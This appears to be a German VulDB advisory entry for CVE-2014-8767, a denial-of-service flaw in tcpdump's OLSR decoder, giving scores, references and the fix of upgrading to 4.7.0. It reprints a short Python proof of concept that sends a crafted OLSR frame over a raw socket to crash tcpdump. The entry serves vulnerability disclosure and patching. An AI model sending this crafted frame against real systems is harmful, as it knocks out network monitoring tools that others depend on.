tcpdump bis 4.6.2 OLSR Decoder olsr_print Denial of Service

HistoryDiffverknüpfenjsonxmlCTI

CVSS Meta Temp Score	Aktueller Exploitpreis (≈)	CTI Interest Score
4.8	$0-$5k	0.00

Zusammenfassunginfo

Eine als problematisch eingestufte Schwachstelle wurde in tcpdump festgestellt. Es betrifft die Funktion olsr_print der Komponente OLSR Decoder. Die Veränderung resultiert in Denial of Service. Die Verwundbarkeit wird unter CVE-2014-8767 geführt. Desweiteren ist ein Exploit verfügbar. Als bestmögliche Massnahme wird Patching empfohlen.

Detailsinfo

Eine Schwachstelle wurde in tcpdump (Packet Analyzer Software) ausgemacht. Sie wurde als problematisch eingestuft. Hierbei geht es um die Funktion olsr_print der Komponente OLSR Decoder. Durch Manipulieren mit einer unbekannten Eingabe kann eine Denial of Service-Schwachstelle ausgenutzt werden. Klassifiziert wurde die Schwachstelle durch CWE als CWE-189. Die Auswirkungen sind bekannt für die Verfügbarkeit. Die Zusammenfassung von CVE lautet:

Integer underflow in the olsr_print function in tcpdump 3.9.6 through 4.6.2, when in verbose mode, allows remote attackers to cause a denial of service (crash) via a crafted length value in an OLSR frame.

Die Schwachstelle wurde am 17.11.2014 durch Steffen Bauch in Form eines bestätigten Postings (Bugtraq) herausgegeben. Das Advisory findet sich auf archives.neohapsis.com. Die Verwundbarkeit wird seit dem 13.11.2014 mit der eindeutigen Identifikation CVE-2014-8767 gehandelt. Das Ausnutzen gilt als leicht. Umgesetzt werden kann der Angriff über das Netzwerk. Das Ausnutzen erfordert keine spezifische Authentisierung. Es sind technische Details sowie ein öffentlicher Exploit zur Schwachstelle bekannt.

Ein öffentlicher Exploit wurde durch Steffen Bauch in Python programmiert und sofort nach dem Advisory veröffentlicht. Unter archives.neohapsis.com wird der Exploit bereitgestellt. Er wird als proof-of-concept gehandelt. Für den Vulnerability Scanner Nessus wurde am 04.12.2014 ein Plugin mit der ID 79697 (Debian DSA-3086-1 : tcpdump - security update) herausgegeben, womit die Existenz der Schwachstelle geprüft werden kann. Es wird der Family Debian Local Security Checks zugeordnet. Der kommerzielle Vulnerability Scanner Qualys bietet das Plugin 170023 (OpenSUSE Security Update for tcpdump, libpcap (openSUSE-SU-2017:1199-1)) zur Prüfung der Schwachstelle an. Der durch den Exploit genutzte Code gestaltet sich wie folgt:

#!/usr/bin/env python 
from socket import socket, AF_PACKET, SOCK_RAW 
s = socket(AF_PACKET, SOCK_RAW) 
s.bind(("lo", 0)) 
olsr_frame = 
"\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"
s.send(olsr_frame)

Ein Aktualisieren auf die Version 4.7.0 vermag dieses Problem zu lösen. Die Schwachstelle lässt sich auch durch das Einspielen eines Patches lösen. Als bestmögliche Massnahme wird das Installieren des jeweiligen Patches empfohlen. Das Erscheinen einer Gegenmassnahme geschah schon vor und nicht nach der Veröffentlichung der Schwachstelle. Die Entwickler haben demzufolge vorab gehandelt.

Unter anderem wird der Fehler auch in den Datenbanken von X-Force (98765), Tenable (79697), SecurityFocus (BID 71150†), SecurityTracker (ID 1031235†) und Vulnerability Center (SBV-52169†) dokumentiert. Von weiterem Interesse können die folgenden Einträge sein: VDB-68218 und VDB-68220. If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Produktinfo

Typ

Packet Analyzer Software

Name

tcpdump

Version

Lizenz

Open-Source

Webseite

Produkt: https://www.tcpdump.org/

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

CVSSv3info

VulDB Meta Base Score: 5.3
VulDB Meta Temp Score: 4.8

VulDB Base Score: 5.3
VulDB Temp Score: 4.8
VulDB Vector: 🔍
VulDB Zuverlässigkeit: 🔍

CVSSv2info

AV	AC	Au	C	I	A
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳

Vektor	Komplexität	Authentisierung	Vertraulichkeit	Integrität	Verfügbarkeit
freischalten	freischalten	freischalten	freischalten	freischalten	freischalten
freischalten	freischalten	freischalten	freischalten	freischalten	freischalten
freischalten	freischalten	freischalten	freischalten	freischalten	freischalten

VulDB Base Score: 🔍
VulDB Temp Score: 🔍
VulDB Zuverlässigkeit: 🔍

NVD Base Score: 🔍

Exploitinginfo

Klasse: Denial of Service
CWE: CWE-189
CAPEC: 🔍
ATT&CK: 🔍

Physisch: Nein
Lokal: Nein
Remote: Ja

Verfügbarkeit: 🔍
Zugang: öffentlich
Status: Proof-of-Concept
Autor: Steffen Bauch
Programmiersprache: 🔍
Download: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Preisentwicklung: 🔍
Aktuelle Preisschätzung: 🔍

0-Day	freischalten	freischalten	freischalten	freischalten
Heute	freischalten	freischalten	freischalten	freischalten

Nessus ID: 79697
Nessus Name: Debian DSA-3086-1 : tcpdump - security update
Nessus Datei: 🔍
Nessus Risiko: 🔍
Nessus Family: 🔍
Nessus Port: 🔍

OpenVAS ID: 703086
OpenVAS Name: Debian Security Advisory DSA 3086-1 (tcpdump - security update)
OpenVAS Datei: 🔍
OpenVAS Family: 🔍

Qualys ID: 🔍
Qualys Name: 🔍

Threat Intelligenceinfo

Interesse: 🔍
Aktive Akteure: 🔍
Aktive APT Gruppen: 🔍

Gegenmassnahmeninfo

Empfehlung: Patch
Status: 🔍

0-Day Time: 🔍
Exploit Delay Time: 🔍

Upgrade: tcpdump 4.7.0

Timelineinfo

12.11.2014 🔍
13.11.2014 +1 Tage 🔍
17.11.2014 +4 Tage 🔍
17.11.2014 +0 Tage 🔍
18.11.2014 +1 Tage 🔍
18.11.2014 +0 Tage 🔍
18.11.2014 +0 Tage 🔍
19.11.2014 +1 Tage 🔍
20.11.2014 +1 Tage 🔍
04.12.2014 +14 Tage 🔍
18.08.2015 +257 Tage 🔍
24.02.2022 +2382 Tage 🔍

Quelleninfo

Produkt: tcpdump.org

Advisory: USN-2433-1
Person: Steffen Bauch
Status: Bestätigt
Bestätigung: 🔍

CVE: CVE-2014-8767 (🔍)
GCVE (CVE): GCVE-0-2014-8767
GCVE (VulDB): GCVE-100-68219

OVAL: 🔍

X-Force: 98765 - tcpdump olsr_print() denial of service, Medium Risk
SecurityFocus: 71150 - tcpdump 'olsr_print()' Function Denial of Service Vulnerability
SecurityTracker: 1031235 - Tcpdump Multiple Flaws Let Remote Users Deny Service
Vulnerability Center: 52169 - RedHat tcpdump 3.9.6 Through 4.6.2 Remote Denial-of Service via a Crafted Length in an OLSR Frame, Medium

scip Labs: https://www.scip.ch/?labs.20161013
Siehe auch: 🔍

Eintraginfo

Erstellt: 19.11.2014 10:35
Aktualisierung: 24.02.2022 23:23
Anpassungen: 19.11.2014 10:35 (86), 24.10.2017 09:39 (7), 24.02.2022 23:08 (3), 24.02.2022 23:23 (1)
Komplett: 🔍
Cache ID: 216:FF9:103

Diskussion

Bisher keine Kommentare. Sprachen: de + en.

Bitte loggen Sie sich ein, um kommentieren zu können.

◂ Zurück Übersicht Weiter ▸

Want to know what is going to be exploited?

We predict KEV entries!